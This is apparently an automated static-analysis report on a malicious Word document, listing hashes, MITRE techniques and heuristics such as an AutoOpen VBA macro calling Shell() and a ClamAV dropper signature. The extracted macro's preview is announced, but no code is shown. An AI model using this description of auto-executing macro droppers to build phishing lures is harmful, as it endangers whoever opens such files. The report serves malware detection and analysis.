Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f58b4c8562b2d9bf…

MALICIOUS

Office (OLE)

Size: 113.5 KB
Created: 2018-02-08 18:02:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: c0fa3d4bc668cc670fd40d4ff5c15083
SHA-1: 380ad19e0069d7d013c1fd93682fe67ae19d91b9
SHA-256: f58b4c8562b2d9bf2cefba2a58405bdab30581167be13231248450616a5740d1
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, which runs automatically when the document is opened. The macro calls the Shell() function, which fired a critical heuristic because it indicates an attempt to execute arbitrary commands. The ClamAV signature 'Img.Dropper.PhishingLure-6443153-0' further supports classifying the sample as a dropper or phishing lure.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code.
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    The VBA code contains a call to Shell().
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen macro, which runs when the document is opened.
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only documents and documents whose source extraction failed, where no visible source is available.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 27941 bytes
SHA-256: d9658e6f61c6ddc8e424e13de49e1cc03a2259f19177daa0b474c0ef46fa96d6
Preview script
First 1,000 lines of the extracted script